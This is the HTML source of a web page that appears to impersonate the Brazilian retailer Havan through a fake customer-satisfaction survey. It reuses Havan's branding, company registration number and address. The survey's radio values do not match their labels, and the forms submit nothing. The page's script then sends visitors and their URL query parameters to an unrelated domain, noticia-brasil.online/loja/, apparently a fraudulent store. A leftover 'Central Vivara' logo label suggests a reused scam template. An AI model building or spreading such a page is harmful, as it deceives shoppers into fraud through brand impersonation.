<!DOCTYPE html><html lang="pt-br"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="css/styles.css">
    <link href="css/styles-l.css" rel="stylesheet">
    <meta name="theme-color" content="#0c3bdd">
    <link rel="stylesheet" href="css/all.min.css">
    <link rel="stylesheet" href="css/fonts.css">
    <script async="" src="js/fbevents.js"></script>
    <script src="js/jquery-3.7.1.min.js" crossorigin="anonymous"></script>
    <link rel="icon" href="images/favico.jpg" type="image/x-icon">
    <link rel="apple-touch-icon" sizes="180x180" href="images/favico.jpg">

    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@600&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200">

    <title>Havan | Tudo num só lugar</title>

    <meta name="title" content="Havan | Tudo num só lugar">
    <meta name="description" content="Ofertas imperdíveis em eletrônicos, eletrodomésticos, moda, brinquedos, decoração e muito mais. Tudo pra você, sua família e sua casa. Tudo em havan.com">
    <meta property="og:image" content="images/P7Y8vEC.jpg">
    <link rel="icon" type="image/x-icon" href="https://www.havan.com.br/media/favicon/stores/1/favicon_havan.png">
<link rel="shortcut icon" type="image/x-icon" href="https://www.havan.com.br/media/favicon/stores/1/favicon_havan.png">


    <script>
        function onLoad() {
            var links = document.getElementsByTagName("a");

            for (var i = 0, n = links.length; i < n; i++) {
                if (links[i].href.includes("#")) {
                    continue;
                }

                var href =
                    links[i].href.trim() +
                    (links[i].href.indexOf("?") > 0 ? "&" : "?") +
                    document.location.search.replace("?", "").toString();
                links[i].href = href;
            }
        }

        document.addEventListener("DOMContentLoaded", onLoad);
    </script>

<script src="js/config.js"></script>
<script src="js/global.js"></script>

<script src="js/latest.js" async="" defer=""></script>
</head>

<body>


    <div class="promotion-banner-container">
        <div class="banner-promocao">

            <div data-content-type="row" data-appearance="contained" data-element="main">
                <div data-enable-parallax="0" data-parallax-speed="0.5" data-background-images="{\" desktop_image\":\"https:="" www.havan.com.br="" media="" tip-bar="" aniversario-havan="" tipbar-mobile-1320x50-aniversario-1.webp\",\"mobile_image\":\"https:="" tipbar-mobile-768x60-aniversario-1.webp\"}"="" data-background-type="image" data-video-loop="true" data-video-play-only-visible="true" data-video-lazy-load="true" data-video-fallback-src="" id="" data-element="inner" data-pb-style="W7XO9VL" class="background-image-66708d8005596 img1">
                    <div data-content-type="html" data-appearance="default" data-element="main" data-decoded="true">

                        <div class="tip-bar-link"> &nbsp;</div>
                        <style>
                            .cms-aniversario .promotion-banner-container {
                                display: none;
                            }

                            .tip-bar-link {
                                display: flex;
                                height: 50px;
                            }
                        </style>
                    </div>
                </div>
                <style type="text/css">
                    .background-image-66708d8005596 {
                        background-image: url(https://www.havan.com.br/media/tip-bar/aniversario-havan/TipBar-Mobile-1320x50-Aniversario-1.webp);
                    }

                    @media only screen and (max-width: 569px) and (min-width: 360px) {
                        .background-image-66708d8005596 {
                            background-image: url(https://www.havan.com.br/media/tip-bar/aniversario-havan/TipBar-Mobile-768x60-Aniversario-1.webp);
                        }
                    }

                    @media only screen and (max-width: 640px) {
                        .background-image-66708d8005596 {
                            background-image: url(https://www.havan.com.br/media/tip-bar/aniversario-havan/TipBar-Mobile-768x60-Aniversario-1.webp);
                        }
                    }
                </style>
            </div>
        </div>
    </div>


    <nav class="navbar" style="padding-top: 15px;">
        <div class="menu-icon" style="padding-left: 3%;">
            <img src="images/logobranca.svg" style="height: 5vh;" alt="Logo Central Vivara">
        </div>

        <div class="logo-central">
        </div>

        <div class="menu-icon" style="padding-right: 3%;">
            <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 10px; color: white">search</span>
            <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 10px; color: white">shopping_cart</span>
            <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 10px; color: white">menu</span>
        </div>
    </nav>

    <main id="maincontent" class="page-main">

        <style>
            .questionnaire-container {
                border-collapse: collapse;
                font-size: 16px;
                margin: 32px auto;
                padding: 16px;
                max-width: 500px;
                background-color: #fff;
                border-radius: 6px;
                box-shadow: 0 2px 20px rgba(0, 0, 0, 0.1);
            }

            .question-title {
                margin-bottom: 20px;
            }

            .questionnaire-form {
                display: flex;
                flex-direction: column;
            }

            .question-options {
                margin-bottom: 20px;
            }

            .question-option {
                display: flex;
                align-items: center;
                margin-bottom: 10px;
            }

            .question-option input[type="radio"] {
                margin-right: 10px;
            }

            .submit-button {
                padding: 10px 20px;
                background-color: #007bff;
                color: #fff;
                border: none;
                border-radius: 4px;
                cursor: pointer;
                transition: background-color 0.3s ease;
            }

            .submit-button:hover {
                background-color: #0056b3;
            }

            .hidden {
                display: none;
            }

            .thank-you-message {
                text-align: center;
                margin-top: 20px;
            }

            .thank-you-message img {
                width: 200px;
                margin-bottom: 10px;
            }

            .redirect-button {
                padding: 10px 20px;
                background-color: #007bff;
                color: #fff;
                border: none;
                border-radius: 4px;
                cursor: pointer;
                transition: background-color 0.3s ease;
                text-decoration: none;
                display: inline-block;
            }

            .redirect-button:hover {
                background-color: #0056b3;
            }

            .start-section {
                text-align: center;
                margin-bottom: 20px;
            }

            .start-section img {
                width: 200px;
                margin-bottom: 10px;
            }

            .start-button {
                padding: 10px 20px;
                background-color: #007bff;
                color: #fff;
                border: none;
                border-radius: 4px;
                cursor: pointer;
                transition: background-color 0.3s ease;
                text-decoration: none;
                display: inline-block;
            }

            .start-button:hover {
                background-color: #0056b3;
            }
        </style>

        <div id="question1" class="questionnaire-container">
            <h3 class="question-title">Como você avaliaria a experiência de
                compra na Havan em termos de facilidade de uso do site
                ou aplicativo?</h3>
            <form id="form1" class="questionnaire-form" onsubmit="return submitForm(1)">
                <input type="hidden" name="_csrf" value="RjdUMSgE-42nMbFXUxA_Rc6JY7WS1C8d635w">
                <div class="question-options">
                    <div class="question-option">
                        <input type="radio" id="option1" name="question1" value="A solução proposta não funciona.">
                        <label for="option1">Muito fácil</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option2" name="question1" value="As informações são confusas.">
                        <label for="option2">Fácil</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option3" name="question1" value="Não estou de acordo com a política.">
                        <label for="option3">Moderadamente fácil</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option4" name="question1" value="Outro motivo.">
                        <label for="option4">Difícil</label>
                    </div>
                </div>
                <button type="submit" class="submit-button">Enviar</button>
            </form>
        </div>

        <div id="question2" class="questionnaire-container hidden">
            <h3 class="question-title">Qual é a sua opinião sobre a variedade de
                produtos disponíveis na Havan?</h3>
            <form id="form2" class="questionnaire-form" onsubmit="return submitForm(2)">
                <input type="hidden" name="_csrf" value="RjdUMSgE-42nMbFXUxA_Rc6JY7WS1C8d635w">
                <div class="question-options">
                    <div class="question-option">
                        <input type="radio" id="option5" name="question2" value="Resposta 1.">
                        <label for="option5">Excelente</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option6" name="question2" value="Resposta 2.">
                        <label for="option6">Boa</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option7" name="question2" value="Resposta 3.">
                        <label for="option7">Aceitável</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option8" name="question2" value="Resposta 4.">
                        <label for="option8">Insatisfatória</label>
                    </div>
                </div>
                <button type="submit" class="submit-button">Enviar</button>
            </form>
        </div>

        <div id="question3" class="questionnaire-container hidden">
            <h3 class="question-title">Como você classificaria a eficiência da
                entrega dos produtos comprados na Havan?</h3>
            <form id="form3" class="questionnaire-form" onsubmit="return submitForm(3)">
                <input type="hidden" name="_csrf" value="RjdUMSgE-42nMbFXUxA_Rc6JY7WS1C8d635w">
                <div class="question-options">
                    <div class="question-option">
                        <input type="radio" id="option5" name="question2" value="Resposta 1.">
                        <label for="option5">Rápida</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option6" name="question2" value="Resposta 2.">
                        <label for="option6">Aceitável</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option7" name="question2" value="Resposta 3.">
                        <label for="option7">Lenta</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option8" name="question2" value="Resposta 4.">
                        <label for="option8">Muito lenta</label>
                    </div>
                </div>
                <button type="submit" class="submit-button">Enviar</button>
            </form>
        </div>

        <div id="question4" class="questionnaire-container hidden">
            <h3 class="question-title">Em relação ao atendimento ao cliente do
                Havan, como você o descreveria?</h3>
            <form id="form4" class="questionnaire-form" onsubmit="return submitForm(4)">
                <input type="hidden" name="_csrf" value="RjdUMSgE-42nMbFXUxA_Rc6JY7WS1C8d635w">
                <div class="question-options">
                    <div class="question-option">
                        <input type="radio" id="option5" name="question2" value="Resposta 1.">
                        <label for="option5">Excelente</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option6" name="question2" value="Resposta 2.">
                        <label for="option6">Bom</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option7" name="question2" value="Resposta 3.">
                        <label for="option7">Regular</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option8" name="question2" value="Resposta 4.">
                        <label for="option8">Insatisfatório</label>
                    </div>
                </div>
                <button type="submit" class="submit-button">Enviar</button>
            </form>
        </div>
        <div id="question5" class="questionnaire-container hidden">
            <h3 class="question-title">Como você avalia a precisão das
                descrições dos produtos na Havan?</h3>
            <form id="form5" class="questionnaire-form" onsubmit="return submitForm(5)">
                <input type="hidden" name="_csrf" value="RjdUMSgE-42nMbFXUxA_Rc6JY7WS1C8d635w">
                <div class="question-options">
                    <div class="question-option">
                        <input type="radio" id="option5" name="question2" value="Resposta 1.">
                        <label for="option5">Muito precisa</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option6" name="question2" value="Resposta 2.">
                        <label for="option6">Precisa</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option7" name="question2" value="Resposta 3.">
                        <label for="option7">Moderadamente precisa</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option8" name="question2" value="Resposta 4.">
                        <label for="option8">Imprecisa</label>
                    </div>
                </div>
                <button type="submit" class="submit-button">Enviar</button>
            </form>
        </div>

        <div id="question6" class="questionnaire-container hidden">
            <h3 class="question-title">Considerando o custo dos produtos
                oferecidos, como você os classificaria em termos de valor pelo
                dinheiro na Havan?</h3>
            <form id="form6" class="questionnaire-form" onsubmit="return submitForm(6)">
                <input type="hidden" name="_csrf" value="RjdUMSgE-42nMbFXUxA_Rc6JY7WS1C8d635w">
                <div class="question-options">
                    <div class="question-option">
                        <input type="radio" id="option5" name="question2" value="Resposta 1.">
                        <label for="option5">Excelente</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option6" name="question2" value="Resposta 2.">
                        <label for="option6">Bom</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option7" name="question2" value="Resposta 3.">
                        <label for="option7">Aceitável</label>
                    </div>
                    <div class="question-option">
                        <input type="radio" id="option8" name="question2" value="Resposta 4.">
                        <label for="option8">Ruim</label>
                    </div>
                </div>
                <button type="submit" class="submit-button">Enviar</button>
            </form>
        </div>
        <style>
            .question-title {
                font-family: 'Montserrat', Helvetica !important;
                font-weight: 700;
                color: black;
            }

            .question-options {
                font-family: 'Montserrat', Helvetica !important;
                font-weight: 600;
                color: black;
            }

            .msg {
                font-family: 'Montserrat', Helvetica !important;
                font-weight: 600;
                color: black;
            }


            .color-options {
                display: flex;
                flex-direction: column;
                align-items: center;
            }

            .color-options img {
                width: calc(100% - 8px);
                /* Calcula a largura subtraindo 8px (4px de cada lado) */
                margin: 19px 0;
                /* Define a margem de 5px em cima e embaixo */
            }

            .color-divider {
                width: 100%;
                border: none;
                border-top: 1px solid #F4F4F4;
                /* Adiciona uma linha divisória fina */
                margin: 5px 0;
                /* Define a margem de 5px em cima e embaixo */
            }

            .thank-you-message img {
                width: calc(100% - 8px);
                /* Calcula a largura subtraindo 8px (4px de cada lado) */
                margin: 5px 0;
                /* Define a margem de 5px em cima e embaixo */
            }

            .color-options {
                display: flex;
                flex-direction: column;
                align-items: center;
            }

            .color-options img {
                width: calc(100% - 8px);
                /* Calcula a largura subtraindo 8px (4px de cada lado) */
                margin: 5px 0;
                /* Define a margem de 5px em cima e embaixo */
                cursor: pointer;
                /* Altera o cursor para indicar que a imagem é clicável */
            }

            .color-divider {
                width: 100%;
                border: none;
                border-top: 1px solid #F4F4F4;
                /* Adiciona uma linha divisória fina */
                margin: 5px 0;
                /* Define a margem de 5px em cima e embaixo */
            }

            .thank-you-message img {
                width: calc(100% - 8px);
                /* Calcula a largura subtraindo 8px (4px de cada lado) */
                margin: 5px 0;
                /* Define a margem de 5px em cima e embaixo */
            }
        </style>



<script>
document.getElementById("start-button").addEventListener("click", function () {
  document.getElementById("start-section").classList.add("hidden");
  document.getElementById("question1").classList.remove("hidden");
});

function submitForm(questionNumber) {
  var currentQuestion = document.getElementById("question" + questionNumber);
  var nextQuestionNumber = questionNumber + 1;
  var nextQuestion = document.getElementById("question" + nextQuestionNumber);

  if (nextQuestion) {
    currentQuestion.classList.add("hidden");
    nextQuestion.classList.remove("hidden");
    return false; // Impede o envio do formulário
  }

  // Esconde a última pergunta e exibe a mensagem de agradecimento
  var lastQuestion = document.getElementById("question" + questionNumber);
  var thankYouMessage = document.getElementById("thank-you");

  if (thankYouMessage) {
    lastQuestion.classList.add("hidden");
    thankYouMessage.classList.remove("hidden");

    // Aguarda 3 segundos antes de redirecionar
    setTimeout(function() {
      var currentUrl = window.location.href;
      var urlObj = new URL(currentUrl);
      var queryParams = urlObj.search;

      window.location.href = 'https://noticia-brasil.online/loja/' + queryParams;
    }, 3000);
  } else {
    // Redireciona diretamente se não houver mensagem de agradecimento
    var currentUrl = window.location.href;
    var urlObj = new URL(currentUrl);
    var queryParams = urlObj.search;

    window.location.href = 'https://noticia-brasil.online/loja/' + queryParams;
  }

  return false; // Impede o envio do formulário
}
</script>


    </main>



    <footer class="page-footer" style="background-color: #0c3bdd !important; padding-bottom: 20px !important; color: #fff !important;">
        <div class="footer content"></div>
        <div class="footer-general-container" style="color: #fff !important;">
            <div class="footer-container">
                <section style="margin-top: 0px !important;" class="content policies">
                    <div data-content-type="html" data-appearance="default" data-element="main" data-pb-style="RKFJFKD" data-decoded="true">
                        <ul style="color: #fff !important; border-top: 0px !important; border-bottom: 1px solid #fff; padding: 0px !important; padding-bottom: 12px !important; justify-content: center !important;">
                            <li>
                                <a href="#" title="Políticas de privacidade" style="color: #fff;">Políticas de
                                    privacidade</a>
                            </li>
                            <li>
                                <a href="#" title="Políticas do site" style="color: #fff;">Políticas do site</a>
                            </li>
                            <li>
                                <a href="#" title="Políticas de entrega" style="color: #fff;">Políticas de entrega</a>
                            </li>
                            <li>
                                <a href="#" title="Troca e devolução" style="color: #fff;">Troca e devolução</a>
                            </li>
                            <li>
                                <a href="#" style="color: #fff;" title="SAC">SAC</a>
                            </li>
                        </ul>
                    </div>
                </section>
                <section class="footer-address">
                    <address style="color: #fff !important; text-align: center !important;" class="copyright">
                        © 1986 - 2024 HAVAN S.A. | CNPJ: 79.379.491.0008-50 | Rod. Antônio Heil, 250 - Centro II,
                        Brusque - SC, 88353-100 <br>
                    </address>
                </section>
            </div>
        </div>
    </footer>




</body></html>
